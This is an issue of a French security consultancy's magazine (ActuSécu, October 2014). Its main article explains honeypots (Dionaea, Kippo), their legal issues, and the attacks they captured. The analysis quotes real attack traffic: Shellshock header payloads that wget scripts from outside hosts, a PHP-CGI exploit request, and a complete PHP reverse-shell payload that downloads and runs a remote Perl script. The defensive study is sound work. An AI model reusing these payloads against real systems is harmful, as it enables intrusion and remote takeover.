Vous êtes sur la page 1sur 66

actu

scu 38
lACTUSCU est un magazine numrique rdig et dit par les consultants du cabinet de conseil XMCO OCTOBRE 2014

Les honeypots
Mise en place et analyse des rsultats gnrs par un honeypot

ShellShock
Analyse de la faille qui fait peur

Confrences
Hack In Paris, SSTIC, HITB

Actualit du moment
Plugins Wordpress, TrueCrypt et Samba (CVE-2014-3560)
Alan Bates

Et toujours la revue du web et nos Twitter favoris !


1

Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.

we deliver security expertise

www.xmco.fr
2
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Vous tes concern
par la scurit informatique
de votre entreprise ?
XMCO est un cabinet de conseil dont le mtier est
laudit en scurit informatique.
Fond en 2002 par des experts en scurit et dirig par ses
fondateurs, les consultants de chez XMCO ninterviennent que
sous forme de projets forfaitaires avec engagement de rsultats.

Les tests dintrusion, les audits de scurit, la veille en
we deliver security expertise
vulnrabilit constituent les axes majeurs de dveloppement
de notre cabinet.

Paralllement, nous intervenons auprs de Directions Gnrales


dans le cadre de missions daccompagnement de RSSI,
dlaboration de schma directeur ou encore de sminaires de
sensibilisation auprs de plusieurs grands comptes franais.

Pour contacter le cabinet XMCO et dcouvrir nos prestations :


http://www.xmco.fr

Nos services

Test dintrusion
Mise lpreuve de vos rseaux, systmes et applications web par nos
experts en intrusion. Utilisation des mthodologies OWASP, OSSTMM, CCWAPSS.

Audit de Scurit
Audit technique et organisationnel de la scurit de votre Systme
dInformation. Best Practices ISO 27001, PCI DSS, Sarbanes-Oxley.

Certification PCI DSS


Conseil et audit des environnements ncessitant la certification PCI DSS
Level 1 et 2.

Cert-XMCO : Veille en vulnrabilits et


Cyber-surveillance
Suivi personnalis des vulnrabilits, des menaces et des correctifs affectant
votre Systme dInformation et surveillance de votre primtre expos sur
Internet

Cert-XMCO : Rponse intrusion


Dtection et diagnostic dintrusion, collecte des preuves, tude des logs,
autopsie de malware.
3

Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
sommaire p. 5
p. 5

Honeypot
Prsentation et fonctionnement

p. 16

ShellShock
Retour sur la faille qui fait peur...

p. 21

p. 16 p. 21 Confrences
HIP, HITB et SSTIC

p. 49

Actualit du moment
Les plugins WordPress, la faille
Samba CVE-2014-3560 et True-
Crypt

p. 61 p. 61

La revue du web et Twitter


p. 49 Slection de liens et de comptes
Twitter

Contact Rdaction : actu.secu@xmco.fr - Rdacteur en chef : Adrien GUINAULT - Direction artistique : Conformment aux lois, la reproduction ou la contrefaon des mo-
Romain MAHIEU - Ralisation : Agence plusdebleu - Contributeurs : Antonin AUROY, Stphane AVI, Etienne dles, dessins et textes publis dans la publicit et la rdaction de
lActuScu 2014 donnera lieu des poursuites. Tous droits rservs
BAUDIN, Frdric CHARPENTIER, Charles DAGOUAT, Damien GERMONVILLE, Yannick HAMON, Marc LEBRUN, - Socit XMCO. la rdaction dcline toute responsabilit pour tous les
Romain LEONARD, Thomas LIAIGRE, Cyril LORENZETTO, Rodolphe NEUVILLE, Julien MEYER, Clment MEZINO, documents, quel quen soit le support, qui lui serait spontanment
confi. Ces derniers doivent tre joints une enveloppe de rexpdi-
Stphanie RAMOS, Arnaud REYGNAUD, Rgis SENET, Julien TERRIAC, Pierre TEXIER, David WEBER.
4 tion prpaye. Ralisation, Octobre 2014.

Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
> Prsentation et fonctionnement dun honeypot
Une des problmatiques majeures en matire de scurit est de savoir dtecter et analyser les attaques rapide-
ment afin de prendre les mesures adquates pour sen protger.

moins de placer des capteurs sur lensemble des systmes composant un SI (ou dtre diteur dantivirus et
davoir ainsi des remontes automatiques), il ny pas cinquante solutions pour cela. La premire est de surveiller
les traces remontes par son SI, lorsque les traces existent et que lon sait o les trouver. La seconde est dutiliser
un IDS. La troisime consiste placer au sein du SI des systmes exposant volontairement des failles de scurit
afin de rvler des comportements douteux...

Ces systmes, qui jouent le rle de pots de miel, sont logiquement appels honeypots . Sont-ils efficaces ?
Quels rsultats peut-on en tirer ? Rponses dans cet article.
Par Charles DAGOUAT

Les Honeypots

Tomaz Stolfa

> Prsentation des honeypots unauthorized or illicit use of that resource (Lance
Spitzner) .
Quest-ce quun honeypot ?
http://www.tracking-hackers.com/papers/honeypots.
La dfinition Wikipedia est on ne peut plus claire. html

Dans le jargon de la scurit informatique, un honeypot, Finalement, un pot de miel correspond donc lmula-
ou pot de miel, est un ordinateur ou un programme vo- tion dun systme dexploitation, dun service, ou enfin
lontairement vulnrable destin attirer et piger les dun simple logiciel vulnrable.
pirates, ou plus gnralement, leurs bots malveillants (cf
http://fr.wikipedia.org/wiki/Honeypot).

Celle de Lance Spitzner permet cependant de complter


cette premire dfinition.

An information system resource whose value lies in 5

Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Caractristiques dun honeypot bien dtre en mesure de remonter des alertes dans le
temps.
partir de ces deux dfinitions, on peut dduire les prin-
cipales caractristiques dun pot de miel :
Pourquoi installer un honeypot ?
+ un honeypot est un systme qui na aucune valeur m-
tier/business en terme de production ; Linstallation dun pot de miel peut avoir plusieurs objec-
tifs :
+ lensemble des communications relatives aux honey-
pots peut tre considr comme tant malveillant : un ho-
neypot cherchant se connecter une autre ressource est
+ analyser le comportement dun pirate ou dun logiciel
malveillant ;
probablement compromis et il ny a aucune raison quun
utilisateur lgitime interagisse avec ce systme ou ce ser-
vice ;
+identifier les postes compromis par des malwares ra-
lisant des scans du rseau interne pour se propager ;

+ un honeypot est la fois un trompe-loeil et un pige


pour les attaquants : ces derniers perdent leur temps
+ identifier les malwares qui se propagent sur un r-
seau;
en sy attaquant, et leurs actions sont minutieusement
pies. Il nous est dj arriv lors dune mission de test
dintrusion de tomber sur un honeypot (et que le RSSI se
+observer les types dattaques menes par les pirates ;
rjouisse et se flicite, lors de la soutenance, de nous avoir
fait perdre quelques minutes) ;
+ ...
+ un honeypot ne peut pas empcher une attaque
comme le pourrait un IPS ou un firewall. Cependant, ce
O placer son honeypot ?

type doutil permet de la dtecter, ainsi que de dtecter Il est important dvoquer la problmatique du placement
ses principales caractristiques : cible, origine, technique du pot de miel au sein du systme dinformation de len-
dexploitation utilises, ... Un pot de miel devrait donc, treprise. Afin dtre en mesure de valoriser les remontes,
dans lidal, tre utilis de manire conjointe avec un il est prfrable de le placer dans un environnement cor-
pare-feu ou un IDS, de manire protger ou plutt respondant lobjectif recherch.
alerter de la possible malveillance interne. Par exemple, si lon veut identifier les postes de travail
compromis sur lesquels les pirates ont install des bots
Il est important de comprendre malveillants sattaquant aux autres postes du SI, il est pr-
que la vulnrabilit frable de placer le pot de miel au milieu mme du LAN,
et non pas dans la DMZ ou en frontal sur Internet.
nest pas forcement prsente Pour identifier une tentative dattaque, il sera au contraire
puisque lhoneypot nest, prfrable de le placer au sein de la DMZ, depuis laquelle
potentiellement, pas compos du logiciel un potentiel attaquant pourrait provenir.
vulnrable dorigine
Il existe un trs grand nombre de stratgies pour mettre Concrtement, les honeypots que lon retrouve le plus
en place un honeypot. Celles-ci vont : couramment prennent la forme dun logiciel install sur
un systme inutilis par les employs de lentreprise. Il
+ de linstallation bte et mchante dune version volon-
tairement vulnrable dun logiciel sur un serveur normale-
permet donc simplement de relever les traces de tenta-
tive de connexion, et les actions qui ont t ralises.
ment inutilis [1] ;

+jusqu linstallation de logiciels plus ou moins com-


plexes permettant de simuler le comportement dautres
Les diffrents types dhoneypots

logiciels vulnrables. En fonction du type dhoneypot, celui-ci est capable din-


teragir un degr plus ou moins lev avec lattaquant.
[1] On peut en effet piger un attaquant potentiel en lat- LENISA distingue en effet les pots de miel en (au moins)
tirant sur un systme dont on sait que les employs ne deux catgories : les Low-interaction honeypots et les
lutilisent pas. Ds lors, lutilisation de ce systme pourra High-interaction honeypots .
tre un indicateur de la prsence dun pirate au sein du
systme dinformation. De mme quil existe des honeypots imitant le comporte-
ment de serveurs vulnrables. Il existe aussi des logiciels
Il est donc important de comprendre que la vulnrabilit reproduisant le comportement de clients vulnrables.
nest pas forcement prsente puisque lhoneypot nest,
potentiellement, pas compos du logiciel vulnrable
dorigine. De plus, lobjectif lors de la mise en place dun
honeypot nest pas de voir son systme compromis pour
6 de vrai , dans les minutes suivant son dmarrage, mais
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Les Honeypots

> High-interaction honeypots vs Low-interaction ho- paramtrables par lanalyste. Un tel outil permet diden-
neypot tifier rapidement les navigateurs cibls par les attaquants
ayant mis en ligne le site ou la page malveillante. Pour
Contrairement aux High-interaction honeypots , les cela, Thug va rcursivement tlcharger et excuter le
Low-interaction honeypots ne sont pas capables de code HTML/JavaScript composant le site, et suivre les re-
reproduire parfaitement le comportement dun logiciel ou directions vers les autres pages ou ressources disponibles.
dun serveur. Cela limite donc considrablement la capaci- De cette manire, il sera possible didentifier les failles
t dun pirate exploiter une faille, et donc celle dun ana- exploites par les pirates.
lyste tudier le comportement de lattaquant. En effet, si
le logiciel utilis permet uniquement de dtecter lexploi- BluePot est quant lui un honeypot permettant dtudier
tation de la faille, il ne sera par exemple pas possible de le comportement dattaquants ciblant les priphriques
voir quelles sont les commandes excutes par le pirate Bluetooth. Son usage sera donc relativement limit.
aprs avoir obtenu un accs au systme.
Ghost USB honeypot est un pot de miel permettant dtu-
Dans le cas dun honeypot de type Low-interaction , dier les malwares se propageant au travers de priph-
le serveur ne supporte pas lintgralit des spcifications rique de stockage USB. Cependant, ce logiciel est trs
du protocole, et donc les fonctionnalits offertes par le proche du HIDS (Host-based IDS) puisquil a pour vocation
logiciel. Un pirate est donc potentiellement en mesure de tre install sur des systmes mis en production.
dcouvrir la supercherie. Dans tous les cas, il ne sera pas
possible dobtenir des traces sur lensemble de lattaque. Enfin, il existe un trs grand nombre dhoneypots. Ltude
ralise par lENISA est ce titre trs intressante,
linverse, un High-interaction honeypot sera capable puisquelle recense un trs grand nombre de pots de miel
de reproduire fidlement les spcifications dun logiciel utilisables dans de nombreux contextes, allant mme
vulnrable. Par exemple, un pirate sera en mesure dinte- jusqu voquer le sujet des honeypots SCADA.
ragir avec le serveur.

> Server-side honeypot vs Client-Side honeypot > INFO


La simple diffrence entre les honeypots de type Ser- La faille Shellshock aurait t exploite pour prendre
ver-side et ceux de type Client-Side est le type du le contrle des serveurs de Yahoo, Lycos et WinZip
logiciel cibl.
Selon Jonathan Hall, un chercheur en scurit, un groupe de pi-
Les pots de miel de type Server-Side regroupent tous rates roumains a russi sinfiltrer sur les serveurs de Yahoo,
Lycos et WinZip.
les logiciels simulant des serveurs et exposant des ser-
vices sur le rseau local ou sur Internet. Les hackers se sont introduits sur ces serveurs en exploitant la
vulnrabilit Shellshock (voir CXA-2014-3129). Aprs avoir t
Inversement, les pots de miel type Client-Side re- attaqu de manire automatique depuis un serveur compromis
groupent les logiciels nexposant pas de service, et requ- de la socit WinZip, le chercheur a pu identifier le script uti-
rant donc de la part du pirate un certain niveau dinterac- lis par les pirates et tablir la liste des victimes. Daprs les
tion avec un utilisateur pour mener bien une attaque. informations ainsi rcupres, Yahoo! Games et Lycos auraient
Parmi ces logiciels, on retrouve bien entendu les naviga- galement t touchs par cette attaque.
teurs Web.
Les serveurs de Yahoo! Games tant utiliss par des millions de
personnes, les pirates ont pu toucher un grand nombre duti-
lisateurs. Linstallation de Java tant obligatoire pour jouer sur
> Autres types dhoneypot le site, ils ont galement profit des vulnrabilits affectant les
versions obsoltes de Java installes sur les systmes des visi-
Cela a dj t voqu, mais il existe dautres types dho- teurs du site.
neypots. Thug, BluePot ou encore Ghost en sont des par-
faits exemples.

En effet, Thug permet de simuler le comportement dun


navigateur web visitant une page Web malveillante (ou
pas). Le navigateur et la version utiliss sont bien entendu 7

Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
> Cas pratique Ces fichiers, qui correspondent des bases SQLite v3
contiennent les informations que lhoneypot a t en me-
sure dextraire de chacune des tentatives dattaques
Aprs avoir prsent le concept du pot de miel, et leurs identifies. Parmi ces informations, on retrouve les iden-
principales caractristiques, intressons-nous maintenant tifiants utiliss, les commandes excutes, ou encore la
quelques exemples. Les logiciels prsents ci-aprs sont signature p0f de lattaquant. Le principal fichier, logsql.
considrs comme tant des rfrences dans leurs ca- sqlite, contient plusieurs tables dans lesquelles se trouvent
tgories. les donnes qui nous intressent :

Dionaea

Linstallation de Dionaea est relativement bien documen-


te sur le site consacr au projet.

Il est cependant ncessaire de compiler plusieurs outils


la main avant dtre en mesure de lancer le programme.
La configuration de loutil se fait au travers du fichier dio-
naea.conf . Celle-ci est relativement bien documente.
Avec un simple client SQL, il est possible de naviguer dans
Une fois lanc, dans une configuration par dfaut, le logi- ces tables, didentifier les choses intressantes, et ainsi
ciel expose plusieurs services, parmi lesquels : de produire les requtes SQL nous permettant dextraire
rapidement ces donnes.

Note : Dionaea supporte parfaitement lIPv6, mais lIPv6


a t dsactiv sur le serveur, ce qui explique pourquoi
aucun socket IPv6 nest identifi par la commande netstat.

Quelques heures seulement aprs le lancement de Dio-


naea, il est possible dobserver dans le fichier contenant
les logs dactivit, ou dans les fichiers gnrs par Dio-
naea des vnements suspects. Plus prcisment, ces fi-
chiers se trouvent dans le dossier /var/dionaea.

il est noter que lun des principaux


avantages de Dionaea est sa flexibilit
Dans ce dossier, il sera possible de retrouver plusieurs fi-
chiers caractristiques du bon fonctionnement du pot de
miel, parmi lesquels :

+ logsql.sqlite : ce fichier contient la trs grande majorit


des informations enregistres par Dionaea, nous revien-
drons dessus un peu plus tard.

+ sipaccounts.sqlite : ce fichier contient quelques infor-


mations relatives aux connexions SIP tablies.

+vtcache.sqlite : ce dernier fichier contient quelques in-


formations relatives aux scans de fichiers rcuprs par
lhoneypot et envoys vers le site VirusTotal pour tre
scanns.
8
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Les Honeypots

noter cependant que de nombreuses requtes dj <random>. Ces fichiers correspondent au contenu envoy
toutes prtes sont proposes dans le blog des dve- par lattaquant, et la rponse qui lui a t retourne par
loppeurs [1] : lhoneypot. Ces fichiers contiennent donc entre autres la
charge malveillante envoye par le pirate pour raliser
+http://carnivore.it/2009/11/06/dionaea_sql_logging son attaque.

+http://carnivore.it/2009/12/12/sqlite_performance Enfin, il est noter que lun des principaux avantages de


Dionaea est sa flexibilit. En effet, nativement, il est ca-
+http://carnivore.it/2009/12/14/virustotal_fun pable de raliser des traitements volus sur les malware
et les envoyer vers des moteurs pour les scanner automa-
+http://carnivore.it/2009/12/15/paris_mission_pack_
avs
tiquement. Par exemple, en configurant quelques para-
mtres, il est possible de pousser les malware identifis
vers le site danalyse en ligne Anubis (http://anubis.ise-
+http://carnivore.it/2010/06/06/data_visualisation clab.org/). Lanalyste naura plus alors qu aller jeter un
coup doeil dans sa boite mail, afin de surveiller lappari-
Pour ceux dsirant jeter un coup doeil au contenu dune tion des rapports danalyses.
telle base, les dveloppeurs mettent disposition un jeu
de deux bases correspondant deux honeypots :
http://carnivore.it/2009/12/08/post_it_yourself Kyppo

A noter que ces bases datant de 2009, la pertinence des Cependant, il existe dautres types dhoneypot, plus
donnes est nulle. Il sagit donc uniquement de prendre simples prendre en main que Dionaea, tels que Kippo.
en main loutil laide de ces donnes. Ce logiciel en python est capable de reproduire le compor-
tement dun serveur SSH.
Enfin, deux outils baptiss readlogsqltree.py et gnu-
plotsql.py sont disponibles pour manipuler les fichiers De manire globale, il permet dexposer sur un port confi-
SQLite gnrs par Dionaea. Le premier permet de lister gurable un serveur SSH. Celui-ci ne permet pas de repro-
les diffrentes connexions ralises vers lhoneypot avec duire une vulnrabilit affectant SSH, mais un problme
leurs principales caractristiques. Le second permet de de configuration du serveur : lutilisation de compte
gnrer un site prsentant les principales statistiques du disposant dun mot de passe faible. Par dfaut, seul le
honeypot, par date ou encore par protocole. compte utilisateur root est dfini, avec pour mot de passe
123456. Avec ce mot de passe, des pirates seront en effet
Ces prcdents fichiers contiennent donc des traces lies en mesure daccder au systme.
aux vnements suspects identifis par lhoneypot. Par
ailleurs, plusieurs dossiers contiennent eux mme dautres
informations intressantes : Cependant, il existe dautres types

+ binaries : ce dossier contient les binaires malveillant


que lhoneypot a tlcharg suite une pseudo-compro-
de honeypot, plus simples prendre en main
que Dionaea, tels que Kippo
mission par lattaquant.
Cependant, une fois connect en SSH, le pirate se retrouve
+ bistreams : ce dossier contient les traces des connexions
tablies par le systme attaquant avec les diffrents ser-
dans un environnement cloisonn, particulirement res-
treint (une sorte de chroot ) dans lequel lensemble
veurs ftpd, httpd, mssqld, VoIP ou encore smbd. des outils disponibles est, ou bien redvelopp en python
(par exemple la commande wget), ou alors correspond
+ rtp : ce dossier contient les captures RTP enregistres
au format PCAP par le serveur SIP ;
de simples fichiers texte prsentant aux pirates un mes-
sage prdtermin.

+wwwroot : ce dossier contient les fichiers dposs par


les pirates sur lhoneypot.
Pour en savoir plus sur les commandes utilisables, il est
possible de sintresser au contenu du dossier txtcmds
(qui contient les fichiers correspondants aux commandes
En tudiant le contenu du dossier bistreams , on peut inutilisables qui ne font rien dautre que dafficher un
trouver des fichiers dont le nom commence par le ser- texte au pirate), ainsi quau dossier kippo/com-
vice ayant gnr la trace, tel que httpd-<PORT>-<IP>- mands/ (dans lequel on retrouve lensemble des com-
9

Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
mandes redfinies en python). Pour le reste du systme Apache et ShellShock
de fichiers, il faut regarder le contenu du dossier honeyfs
, dans lequel on peut retrouver les classiques group , La mise en ligne dun simple serveur web peut galement
hosts , issue , passwd , et enfin shadow . apporter des informations intressantes proches de celles
pouvant tre remontes par un honeypot. Pas besoin de
mettre en place de composants vulnrables, la seule ana-
lyse des logs permet de relever certains types dattaques.
On scarte donc effectivement un peu des honeypots,
mais les informations pouvant tre releves sont trs si-
milaires, pour un peu quon prenne le temps danalyser
les rsultats.

La commande grep -r () { /var/log/apache2 permet


didentifier facilement un grand nombre de tentative dat-
taques ciblant un serveur web Apache. Morceaux choisis

+ nginx-access: 198.XXX.XXX.74 -
Sep/2014:23:12:16 +0200] GET / HTTP/1.1 302 154
- [25/

Lide associe lutilisation de cet honeypot est double. () { :; }; /bin/ping -c 1 104.131.0.69 () { :; }; /bin/ping
La principale fonctionnalit est denregistrer les sessions -c 1 104.XX.X.69

+
SSH tablies par les pirates ou par leurs bots, afin didenti-
fier les actions ralises sur le systme : ajout de compte nginx-access: 62.XX0.XXX.170 - - [06/Oct/2014:13:07:24
utilisateur, tlchargement de fichiers, excution de com- +0200] GET / HTTP/1.1 200 2749 - () { :; }; wget
mandes diverses et varies... http://dev.xxxxx.ru/aHR0cDovL3htY28ub3Jn >> /dev/null
Ces sessions sont enregistres dans le dossier log/tty ,

+
et peuvent tre visualises laide de loutil playlog.py
prsent dans le dossier utils . nginx-access: 62.XX0.XXX.170 - - [30/
Sep/2014:09:02:50 +0200] GET /cgi-sys/entropysearch.
Mais cet honeypot est aussi volutif. Cest--dire quil est cgi HTTP/1.1 404 100327 () { :; }; wget http://xxxxx.
en mesure dapprendre en fonction des actions ra- ru/eG1jby5mclNoZWxsU2hvY2tTYWx0 >> /dev/null
lises par les pirates. Ainsi, un pirate est en mesure de () { :; }; wget http://xxxxx.ru/eG1jby5mclNoZWxsU-
modifier le mot de passe associ au compte root laide 2hvY2tTYWx0 >> /dev/null

+
de la commande passwd . Kippo mmorise le change-
ment effectu par le pirate, et le serveur SSH devient donc nginx-access: 85.XXX.XXX.107 - [25/Sep/2014:23:32:36
accessible avec le nouveau mot de passe dfini. Avec le +0200] GET /veille/client/index.xmco?nv= HTTP/1.1
temps, le serveur devient donc accessible avec un nombre 301 178 - () { :;}; ping -c 1 85.XX.XXX.11 -

+
toujours plus important de mots de passe. Ceux-ci peuvent
tre trouvs dans le fichier data/userdb.txt . nginx-access: 174.XXX.XXX.121 - - [02/
Oct/2014:00:53:04 +0200] GET //cgi-bin/bash HTTP/1.0
404 55067 - () { :;}; /bin/bash -c \x22wget xxxx.
com/legend.txt -O /tmp/.apache;killall -9 perl;perl /tmp/.
Kyppo est aussi volutif, cest--dire quil
apache;rm -rf /tmp/.apache\x22
est en mesure dapprendre en fonction
des actions ralises par les pirates Ces quelques lignes de log montrent la simplicit avec
laquelle il est possible didentifier lorigine de ces at-
taques et les commandes que les pirates ont cherch
Parmi les autres points noter concernant le fonctionne- excuter sur les systmes quils ont scanns.
ment de Kippo, les fichiers tlchargs par les auteurs des
tentatives dactions malveillantes peuvent tre retrouvs Ici, les pirates ont simplement plac leur payload au
dans le dossier dl . On trouve ici souvent des archives sein des enttes HTTP Referrer et/ou User-Agent .
dont les noms permettent aux pirates de ne pas veil- Si les serveurs ayant trait ces requtes exposaient un
ler les soupons des administrateurs, avec lutilisation de comportement vulnrable similaire celui du mod_cgi
lextension JPG par exemple. Ces archives contiennent la dApache, les pirates auraient t en mesure de les forcer
plupart du temps diffrents scripts utiliss par les pirates tlcharger des scripts depuis dautres serveurs et les
pour commettre leurs mfaits. La plupart dentre elles ont excuter, ou encore excuter des commandes telles que
t dj t tudies sur internet, limage de la suite des ping vers des serveurs sous leur contrle afin didenti-
doutils post-exploitation gosh ou encore dun bot IRC fier les serveurs pouvant tre compromis.
driv dEnergyMech [2].
A noter, la mdiatisation de cette attaque a pouss un
Un tel outil permet par exemple didentifier les postes chercheur dvelopper un petit honeypot baptis Shock-
compromis dans le rseau interne sur lesquels a t ins- pot spcialement ddi lidentification des attaques ti-
tall un bot. rant partie de ShellShock et ciblant les serveurs web [3].
10
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Les Honeypots

Et le ct lgal dans tout a ?

Un point na pas t voqu jusqu prsent : a-t-on le


+ La mise en place dun honeypot ncessite de mettre
en place une capacit de rponse proportionne.
droit, en France, de mettre en place un honeypot, dans
quelles conditions, et avec quelles limites ? Finalement, selon Marie BAREL, il est complexe de sta-
tuer clairement sur la lgalit ou non de lusage dun ho-
Ne disposant pas de juriste chez XMCO, on se rfrera neypot, tant les contextes de mise en place et la varit
la (maigre ?) documentation disponible en ligne. Un des des outils disponibles est importante. De plus, en 2004,
premiers documents abordant ce sujet a t prsent en la jurisprudence permettant dinterprter les textes de loi
2004 au SSTIC, par Marie BAREL. Bien que juridiquement, tait, il semblerait, particulirement maigre.
le sujet abord a probablement volu depuis la publi-
cation de cet article, les questions souleves montrent la Selon la juriste, la mise en place dun honeypot de re-
complexit du sujet, et donnent des pistes de rflexion. cherche ne pose pas de rel problme juridique, car ils
rendent impossible, de fait, la constitution dun dossier
des fins de poursuites judiciaires. Inversement, les ho-
Finalement, selon Marie BAREL, neypot de production ncessitent des prcautions en
terme juridique, ne serait-ce que pour traiter correctement
il est complexe de statuer la problmatique de lattaquant interne, qui, comme tous
clairement sur la lgalit ou autres employs, dispose de droits interdisant une en-
non de lusage dun honeypot, treprise de collecter et danalyse des donnes hors de tout
tant les contextes de mise en place, cadre strictement dfini en termes juridiques [4].
et la varit des outils disponibles
est importante

Parmi les problmatiques abords dans ce document, on


retiendra :

+A-t-on le droit mettre en ligne un honeypot ?


+Mettre en ligne un honeypot reviendrait-il inciter la
ralisation de crimes et dlits ?

+Mettre en ligne un systme volontairement vulnrable


reprsenterait-il un consentement implicite de la victime ?

+Mettre en ligne un systme volontairement vulnrable


reprsenterait-il une ngligence coupable ?

+Y a-t-il des limites la capture des donnes et la


surveillance de lactivit des attaquants ?

+La nature des donnes collectes et la lgislation sur la


protection des donnes caractre personnel.

+Les limites la surveillance de lactivit des intrus :


problmatique des attaquants internes et licit des
moyens utiliss pour la captation des donnes.

+ La mise en place dun honeypot ncessite une matrise


des risques, avec le cas du rebond de lattaquant depuis
un honeypot vers un systme sensible.

11

Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Analyse des rsultats dans le corps dune requte est relativement trange,
puisque le code PHP est normalement interprt par un
Aprs avoir expos durant plusieurs semaines les pots de serveur afin de renvoyer du code HTML ou quivalent au
miel Dionaea et Kippo sur Internet, il est possible de se sein de la rponse retourne par le serveur HTTP.
faire une ide de la pertinence des informations remon-
tes. En sintressant la ressource encode, on identifie rapi-
dement le type dencodage utilis. Quelques lignes de py-
De manire gnrale, il ne faut pas sattendre obtenir thon, ou un site sur Internet permettent dy voir plus clair :
des informations prtes lemploi avec Dionaea ou Kippo.
Comme toute solution de supervision , il est ncessaire
de passer du temps tudier les rsultats pour en extraire
les informations vraiment pertinentes.

Par exemple, comme plusieurs autres CERT, nous avons pu


observer chez nos clients la fin de lanne 2013 des at-
taques ciblant les serveurs web configurs pour excuter
linterprteur PHP en mode CGI (CVE-2012-1823). En re-
gardant les attaques remontes par Dionaea durant cette
priode, nous avons en effet pu observer les mmes types
dattaques. Concrtement, en ralisant un simple grep
sur les fichiers contenus dans le dossier bistream ,
on a rapidement pu identifier de nombreuses tentatives
dattaques ciblant des serveurs PHP. Par exemple, lun de
ces fichiers contenait les donnes suivantes :

LURL visite est donc la suivante :


POST /cgi-bin/php4?-d allow_url_include=on -d safe_mo-
de=off -d suhosin.simulation=on -d disable_functions=
-d open_basedir=none -d auto_prepend_file=php://input
-d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n
HTTP/1.1

On voit tout de suite ce que le pirate a cherch faire :


exploiter une faille au sein de PHP-CGI pour contourner la
configuration dfinie sur le serveur et ainsi excuter du
code PHP arbitraire.
Un simple copier-coller du contenu du fichier dans un in-
terprteur Python permet de manipuler ces donnes. En- En regardant un peu plus loin dans le corps de la requte,
suite, la commande print stream[0][1] permet daffi- on retrouve dailleurs les grandes tapes que lattaquant
cher dune manire plus lisible les donnes reues par le souhaitait drouler pour prendre le contrle de notre ser-
serveur. veur. Ici, il va :

+ tlcharger un script Perl (d1e.txt) sur un serveur dis-


tant, et lexcuter ;

+excuter le Shell /bin/sh aprs avoir configur lenvi-


ronnement de travail afin de ne pas garder de traces des
commandes excutes (unset HISTFILE; unset HISTSIZE;) ;

+ et enfin, rediriger les entres/sorties du Shell vers un


socket ouvert vers une adresse IP contrle par le pirate.

On reconnait ici rapidement une requte HTTP, compose


du verbe POST, dune ressource trange encode, des dif-
frents enttes HTTP et enfin du corps de la requte, qui
correspond ici du code PHP. La prsence de code PHP
12
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Les Honeypots

POST /cgi-bin/php4?%2D%64+%61%6C%6C%6F%77%5F%75 exit(1);


%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+% }
2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%6 $descriptorspec = array(
6%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%6 0 => array( pipe , r ),
9%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64 1 => array( pipe , w ),
+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74% 2 => array( pipe , w )
69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E% );
5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D $process = proc_open($shell, $descriptorspec, $pipes);
%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64% if (!is_resource($process)) {
5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E% printit( ERROR: Cant spawn shell );
70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%- exit(1);
65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64 }
+%63%67%69%2E%72%65%64%69%72%65%63%74%5F% stream_set_blocking($pipes[0], 0);
73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E stream_set_blocking($pipes[1], 0);
HTTP/1.1 stream_set_blocking($pipes[2], 0);
Host: 88.XXXX.XXXX.25 stream_set_blocking($sock, 0);
User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) while (1) {
AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mo- if (feof($sock)) {
bile/10A5355d Safari/8536.25 printit( ERROR: Shell connection terminated );
Content-Type: application/x-www-form-urlencoded break;
Content-Length: 2456 }
Connection: close if (feof($pipes[1])) {
printit( ERROR: Shell process terminated );
<?php break;
set_time_limit(0); }
$ip = 94.75.193.145; $read_a = array($sock, $pipes[1], $pipes[2]);
$port = 90; $num_changed_sockets = stream_select($read_a, $write_a,
$chunk_size = 1400; $error_a, null);
$write_a = null; if (in_array($sock, $read_a)) {
$error_a = null; if ($debug) printit( SOCK READ );
$shell = unset HISTFILE; unset HISTSIZE; uname -a; w; id; /bin/ $input = fread($sock, $chunk_size);
sh -i; if ($debug) printit( SOCK: $input );
$daemon = 0; fwrite($pipes[0], $input);
$debug = 0; }
system( cd /var/tmp/;rm -rf d1*;killall -9 perl;wget http:// if (in_array($pipes[1], $read_a)) {
hisxxxx.info/d1e.txt; curl -O http://hisxxxx.info/d1e.txt; if ($debug) printit( STDOUT READ );
lwp-download http://hisxxxx.info/d1e.txt; fetch http://hisxxxx. $input = fread($pipes[1], $chunk_size);
info/d1e.txt;perl d1e.txt;rm -rf d1e.txt ); if ($debug) printit( STDOUT: $input );
if (function_exists(pcntl_fork)) { fwrite($sock, $input);
$pid = pcntl_fork(); }
if ($pid == -1) { if (in_array($pipes[2], $read_a)) {
printit( ERROR: Cant fork ); if ($debug) printit( STDERR READ );
exit(1); $input = fread($pipes[2], $chunk_size);
} if ($debug) printit( STDERR: $input );
if ($pid) { fwrite($sock, $input);
exit(0); }
} }
if (posix_setsid() == -1) { fclose($sock);
printit( Error: Cant setsid() ); fclose($pipes[0]);
exit(1); fclose($pipes[1]);
} fclose($pipes[2]);
$daemon = 1; proc_close($process);
} else { function printit ($string) {
printit( WARNING: Failed to daemonise. ); if (!$daemon) {
} print $string
chdir( / ); ;
umask(0); }
